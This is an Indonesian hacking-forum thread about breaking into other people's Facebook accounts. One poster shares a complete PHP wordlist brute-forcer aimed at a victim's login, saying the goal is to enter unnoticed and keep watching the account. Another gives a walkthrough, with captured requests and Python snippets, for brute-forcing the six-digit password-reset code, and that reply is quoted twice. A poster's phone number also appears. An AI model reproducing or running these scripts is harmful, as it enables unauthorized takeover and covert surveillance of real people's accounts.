[ryudark]

Sorry sebelumnya kalo ane mungkin salah alamat..
ane cuma mau berbagi..
ane mau coba nembus facebook..
tapi kemampuan ane keknya belum mampu kalo harus nembusin databasenya..
cm ada yang lebih gampang , walaupun lama..
gini ceritanya..
ane dah bikin php yang isinya kurang lebih..
ngebrute web facebook..
ane kira yang bakal jadi masalah captcha..
ane dah ampir mau bikin program pembaca captcha..
ternyata facebook gak cuma ngamanin brute forcer dari captcha doank..
facebook ndetec id yang mau di brute force , seberapa sering kita login pake id itu..
kalo dari php ane, ane cuma tembus 15 kali..setelah itu harus nunggu beberapa menit untuk bisa ngebrute lagi..
jadi kalo dari password list kita masukin password yang bener di list ke 12..
kita masih bisa dapet passwordnya..
untuk 5 digit password aja bisa sebulan itu ngebrute nya..

nah yang ane pgn tanyain..
ada gak saran dari brother-brother disini yang jago exploit buat ngakalin "mesin pembaca berapa sering kita login itu?" ..
untuk mungkin saran lainnya(kalo boleh, mungkin source codenya/aplikasinya sekalian ) ane ucapin terima kasih banyak..

soalnya jujur ane belum tertarik sama linux..makanya masih buta ama open source..

oh iya btw ane mau lho ikut team back track ini mungkin bisa kasih dikit infonya?
ane jogja
YM : [email protected]

---

wah sori gak tau kalo disini gak boleh pake "bro" maap om om skalian..

---

weleh baru sadar kata2 Ag.an nya dah ganti sendiri, kwwk keren2..
maklum pengguna baru..

[Ares]

Bro, Hem.. Mungkin bisa berbagi Scriptnya kita Operek bareng-bareng.

[Junior Riau]

bisa dilihat dihalaman depan om www.indonesianbacktrack.or.id

bener kata om ares,kalau bisa script nya disertakan dimari ,jadi teman" bisa coba memahami cara kerja n juga bisa membantu mencari penyelesaian yang om hadapi,, seperti kata om ares. oprek bareng" , itu asik lo

[jimmyromanticdevil]

hehe .. sy juga sempat berfikir seperti itu om dlu....hmm gini aj om coba reset password om ..nah ntr si facebook ngirim itu key untuk reset password di email .. dan coba perhatikan key itu ..keynya itu berupah acak/random dan panjang kl gug salah char 5...ya kl gug salah sih dlu tp gug tau skrg halaman reset password itu gug di proteksi ... jadi biar berapa kali inputan tetap gug di block...nah sekarang gimana dengan sebuah key yang di kirim ke email ? itu kan dia acak.... jadi gunakan brute force untuk melakukan serangan ..jangan yg make dictionary.... jadi atur memang max min ..misal panjang karakter 5 otomatis max min itu 1-5 ... ok happy research ..

[ryudark]

cara untuk brute force abis di reset password boleh juga..tapi tetep aja kita nembus nya harus brute force login nya kan??
dan lagi tujuan saya itu istilahnya "maling tanpa ngrusak pintu..masuk rumah di kunci lagi..jadi orang rumah gak tau ada maling dalam rumah"
kalo kaya tadi kayak maling jebol pintu pake linggis..
jadi passwordnya gak ganti sama sekali..tapi kita tau passwordnya itu yang terbaik..
ok ane share dah..

[shcode=php]<?php
$dictionary ="password.txt"; // file password
if(!is_file($dictionary)){echo "gawe o password.txt ne sek trus di isi list password e";exit;}
$hore ="hasil.txt"; // file password
if(!is_file($hore)){echo "gaweo hasil.txt, mbok alon2 ngopo to, gelem e og penak";exit;}
$lines=file($dictionary);
set_time_limit(0);
$username =""; // Email target korban
$username1 =""; //email facebook kamu(apa aja yang penting pasti masuk)
$pass="pass"; //diamkan
$pass1 = "";//password facebook kamu(apa aja yang penting pasti masuk)



foreach($lines as $line){
sleep(10);
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
$pass=$line;
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";

$data1 = "email=$username1&pass=$pass1&login=Login";
$ch1 = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch1, CURLOPT_HEADER, 0);
curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch1, CURLOPT_POST, 1);
curl_setopt($ch1, CURLOPT_POSTFIELDS, $data1);
curl_setopt($ch1, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch1, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch1, CURLOPT_COOKIEJAR, 'cookie.txt');


$data = "email=$username&pass=$pass&login=Login";
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');

$source=curl_exec ($ch);
curl_close ($ch);
echo $source;
if(eregi("notifications",$source)){echo $line." bener <br /> ";
$fp=fopen('Hasil.txt','w');
fwrite($fp,$line);exit;
}else{echo $line." salah <br/>";}
}
?>[/shcode]
echo $source; bisa di hilang kan kalo ga mau ngeliat tampilan hasil..

---

mentang2 suruh masukin email ama passwordnya jangan di kira ane scam..baca dlu scriptnya ok?

(edit by koecroet)

[ekawithoutyou]

wih coba di kasih tag

(code) (/code)

om biar rapi om katanya jogja yak wah aio kita kumpul

[Junior Riau]

[ code ] isi [ /code] tak om?? (ilangin spasi antar kurung siku dan tulisan "code")

[jimmyromanticdevil]

Code:

cara untuk brute force abis di reset password boleh juga..tapi tetep aja kita nembus nya harus brute force login nya kan??
dan lagi tujuan saya itu istilahnya "maling tanpa ngrusak pintu..masuk rumah di kunci lagi..jadi orang rumah gak tau ada maling dalam rumah"
kalo kaya tadi kayak maling jebol pintu pake linggis..
jadi passwordnya gak ganti sama sekali..tapi kita tau passwordnya itu yang terbaik..
ok ane share dah..

oh tidak .. kan kalau kita sudah reset kata sandi kita akan di arahkan ke halaman resetnya yang dimana kita cuman cukup menginput email dan akan di arahkan pada terakhirnya di halaman input /textbox reset code . nah kode reset itu akan di sent ke email target.. nah di sini kita tidak perlu lagi masuk ke email target ... kan itu form boxnya sudah ada .. nah tinggal brute force aja di situ..panjang dari sebuah code reset yang di krimkan itu ada 6 char . example : 654789 -> yang diamna dia adalah angka yang di acak di sini sebenarnya untungnya jadi kita sudh tau type keynya ap... nah kita tinggl buat saja random key yang nnt di gunakan untuk membrute force box tersebut dengan panjang enam jd akan ada looping di sini..setelah berhasil kita akan di arahkan ke form box atur ulang kata sandi di situ lah kita atur ulang passwordnya...jadi tidk perlu lagi brute force login ...

proc of consep :
sediakan livehttp header(addons firefox) untuk membaca kemana sebenarnya data di posting setelah tomobl submit di klick .. trace action urlnya kemana dan trace value ap yang di bawa saat post terjadi..
example :
gw ngetrace dari live http header

Code:

https://www.facebook.com/ajax/login/help/identify.php?select_user_url=%2Frecover.php&no_selection_url=%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset&instructions=password_reset&flow=pw_reset&skip_confirmation=1&__a=1 ==> ini action urlnya

POST /ajax/login/help/identify.php?select_user_url=%2Frecover.php&no_selection_url=%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset&instructions=password_reset&flow=pw_reset&skip_confirmation=1&__a=1 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
X-SVN-Rev: 548768
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://www.facebook.com/recover.php
Content-Length: 165
Cookie: datr=seX-Tmd9vO9Lb-cTCVtZ8iPd; lu=gA1vNoMmFeovID-1Y17i8Aow; locale=en_US; lsd=AVpGiH6Q; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Findex.php%3Fstype%3Dlo%26lh%3
Pragma: no-cache
Cache-Control: no-cache
lsd=AVpGiH6Q&email=Youremail%40gmail.com&profile_url=&your_name=&friend_name=&did_submit=Search&fb_dtsg=AQBcKgL7&__user=0&phstamp=165816699751037655135 ==>data yang di bawa...
HTTP/1.1 200

kalau di code html ?

Code:

<form rel="async" id="identify_yourself_flow" action="/ajax/login/help/identify.php?select_user_url=%2Frecover.php&amp;no_selection_url=%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset&amp;instructions=password_reset&amp;flow=pw_reset&amp;skip_confirmation=1" method="post" onsubmit="return Event.__inlineSubmit(this,event)"> ==> ini form action urlnya


<input type="hidden" name="lsd" value="AVpGiH6Q" autocomplete="off" /><div class="mvl ptm uiInterstitial uiInterstitialLarge uiBoxWhite"
<input type="text" class="inputtext DOMControl_placeholder" id="identify_email" name="email" placeholder="Email or Phone" value="Email or Phone" title="Email or Phone" /> ==>value data yang di bawah

selanjutnya...bagaimana algo codenya ?
gunakan teknik html parse dengan cookies handeling untuk mengclick url2 yang ad di page facebook ..
ambil form2 action "post" nya dengan teknik regex dan value name boxnya dan gunakan itu untuk submit data ...

example di python .. gw python soalnya

Code:

CHandler = urllib2.HTTPCookieProcessor(cookielib.CookieJar())
    opener = urllib2.build_opener(CHandler)
    opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre')]
    urllib2.install_opener(opener)
    value = {'lsd':'',
             'email' : 'emailtarget',
             'profile_url':'',
             'your_name':'',
             'friend_name':'',
             'did_submit' : 'Search',
    }
    post_data = urllib.urlencode(value)
    url_next = opener.open('https://www.facebook.com/ajax/login/help/identify.php?select_user_url=/recover.php&no_selection_url=/help/contact.php?show_form=cannot_identify&flow=pw_reset&instructions=password_reset&flow=pw_reset&skip_confirmation=1&__a=1',post_data)
    regex = re.compile('role="button" href="(.*)\">\u003Cspan class=\"uiButtonText\">Ini Akun Saya')
    r = regex.search(url_next.read().replace("\\",""),re.M|re.I)
    print '[Scrap Action Form result: ]> ',r.groups(1)[0]

dan begitupun selanjutnya ... cuman main gini doang ..

ntr terakhir buatkan fungsi random password pada codemu untuk brute force nnt ..
dan jangan lupa gunakan multithreading supaya jalanya multitasking,,,proses akan cepat ...
dan kl untuk cek apakah berhasil atau tidak gunakan regex .. example :

Code:

if re.search('Kode Atur Ulang Kata Sandi:',url_next2):
    print 'failed'
    continue
else:
   print 'succes'

"berarti jika ada tulisan Kode Atur Ulang Kata Sandi di dalam page berarti dia masih di page input code konfirmasi jika tidak berarti dia sudh tidk di page tersebut ...

hmm td ad waktu luang ..iseng2 gw cb coding sejam yg lalu ... cmn di sini codenya saya tdk share hanya akan show off ..
silahkan research sendiri
so here is :

[ekawithoutyou]

wuih mantep om jimmy kayaknya ane harus coba ni kalau pun kagak ngerti :tkp:

[ryudark]

Code:

cara untuk brute force abis di reset password boleh juga..tapi tetep aja kita nembus nya harus brute force login nya kan??
dan lagi tujuan saya itu istilahnya "maling tanpa ngrusak pintu..masuk rumah di kunci lagi..jadi orang rumah gak tau ada maling dalam rumah"
kalo kaya tadi kayak maling jebol pintu pake linggis..
jadi passwordnya gak ganti sama sekali..tapi kita tau passwordnya itu yang terbaik..
ok ane share dah..

oh tidak .. kan kalau kita sudah reset kata sandi kita akan di arahkan ke halaman resetnya yang dimana kita cuman cukup menginput email dan akan di arahkan pada terakhirnya di halaman input /textbox reset code . nah kode reset itu akan di sent ke email target.. nah di sini kita tidak perlu lagi masuk ke email target ... kan itu form boxnya sudah ada .. nah tinggal brute force aja di situ..panjang dari sebuah code reset yang di krimkan itu ada 6 char . example : 654789 -> yang diamna dia adalah angka yang di acak di sini sebenarnya untungnya jadi kita sudh tau type keynya ap... nah kita tinggl buat saja random key yang nnt di gunakan untuk membrute force box tersebut dengan panjang enam jd akan ada looping di sini..setelah berhasil kita akan di arahkan ke form box atur ulang kata sandi di situ lah kita atur ulang passwordnya...jadi tidk perlu lagi brute force login ...

proc of consep :
sediakan livehttp header(addons firefox) untuk membaca kemana sebenarnya data di posting setelah tomobl submit di klick .. trace action urlnya kemana dan trace value ap yang di bawa saat post terjadi..
example :
gw ngetrace dari live http header

Code:

https://www.facebook.com/ajax/login/help/identify.php?select_user_url=%2Frecover.php&no_selection_url=%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset&instructions=password_reset&flow=pw_reset&skip_confirmation=1&__a=1 ==> ini action urlnya

POST /ajax/login/help/identify.php?select_user_url=%2Frecover.php&no_selection_url=%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset&instructions=password_reset&flow=pw_reset&skip_confirmation=1&__a=1 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
X-SVN-Rev: 548768
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://www.facebook.com/recover.php
Content-Length: 165
Cookie: datr=seX-Tmd9vO9Lb-cTCVtZ8iPd; lu=gA1vNoMmFeovID-1Y17i8Aow; locale=en_US; lsd=AVpGiH6Q; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Findex.php%3Fstype%3Dlo%26lh%3
Pragma: no-cache
Cache-Control: no-cache
lsd=AVpGiH6Q&email=Youremail%40gmail.com&profile_url=&your_name=&friend_name=&did_submit=Search&fb_dtsg=AQBcKgL7&__user=0&phstamp=165816699751037655135 ==>data yang di bawa...
HTTP/1.1 200

kalau di code html ?

Code:

<form rel="async" id="identify_yourself_flow" action="/ajax/login/help/identify.php?select_user_url=%2Frecover.php&amp;no_selection_url=%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset&amp;instructions=password_reset&amp;flow=pw_reset&amp;skip_confirmation=1" method="post" onsubmit="return Event.__inlineSubmit(this,event)"> ==> ini form action urlnya


<input type="hidden" name="lsd" value="AVpGiH6Q" autocomplete="off" /><div class="mvl ptm uiInterstitial uiInterstitialLarge uiBoxWhite"
<input type="text" class="inputtext DOMControl_placeholder" id="identify_email" name="email" placeholder="Email or Phone" value="Email or Phone" title="Email or Phone" /> ==>value data yang di bawah

selanjutnya...bagaimana algo codenya ?
gunakan teknik html parse dengan cookies handeling untuk mengclick url2 yang ad di page facebook ..
ambil form2 action "post" nya dengan teknik regex dan value name boxnya dan gunakan itu untuk submit data ...

example di python .. gw python soalnya

Code:

CHandler = urllib2.HTTPCookieProcessor(cookielib.CookieJar())
    opener = urllib2.build_opener(CHandler)
    opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre')]
    urllib2.install_opener(opener)
    value = {'lsd':'',
             'email' : 'emailtarget',
             'profile_url':'',
             'your_name':'',
             'friend_name':'',
             'did_submit' : 'Search',
    }
    post_data = urllib.urlencode(value)
    url_next = opener.open('https://www.facebook.com/ajax/login/help/identify.php?select_user_url=/recover.php&no_selection_url=/help/contact.php?show_form=cannot_identify&flow=pw_reset&instructions=password_reset&flow=pw_reset&skip_confirmation=1&__a=1',post_data)
    regex = re.compile('role="button" href="(.*)\">\u003Cspan class=\"uiButtonText\">Ini Akun Saya')
    r = regex.search(url_next.read().replace("\\",""),re.M|re.I)
    print '[Scrap Action Form result: ]> ',r.groups(1)[0]

dan begitupun selanjutnya ... cuman main gini doang ..

ntr terakhir buatkan fungsi random password pada codemu untuk brute force nnt ..
dan jangan lupa gunakan multithreading supaya jalanya multitasking,,,proses akan cepat ...
dan kl untuk cek apakah berhasil atau tidak gunakan regex .. example :

Code:

if re.search('Kode Atur Ulang Kata Sandi:',url_next2):
    print 'failed'
    continue
else:
   print 'succes'

"berarti jika ada tulisan Kode Atur Ulang Kata Sandi di dalam page berarti dia masih di page input code konfirmasi jika tidak berarti dia sudh tidk di page tersebut ...

hmm td ad waktu luang ..iseng2 gw cb coding sejam yg lalu ... cmn di sini codenya saya tdk share hanya akan show off ..
silahkan research sendiri
so here is :

duh makasih banget bro..tapi seperti yang saya bilang..ini nanti passwordnya ganti bro..kalo passwordnya ganti yang punya id pasti sadar dan bingung password dia kok ganti..
yang saya inginkan..passwordnya tetap seperti biasa dan yang punya gak sadar kalo sudah di hack..sambil kita mantau trus rumah yang kita jebol

---

boleh siapapun yang di jogja berhubungan dengan IT kumpul yok sminggu sekali buat sharing?

cracker,hacker,coding php,java,c,c#,c++,phyton,dsb..
untuk bikin janji sms ane aja
cho
085643568387

mungkin bisa jadi tempat sharing dan bentuk komunitas yang kuat dan solid..
dan bisa jadi tempat kita cari nafkah online bareng2..(bukan hack web orang lho.., ngakalin adsense,google, apa aja deh)

bangunin naga merah jogja yoks.. !!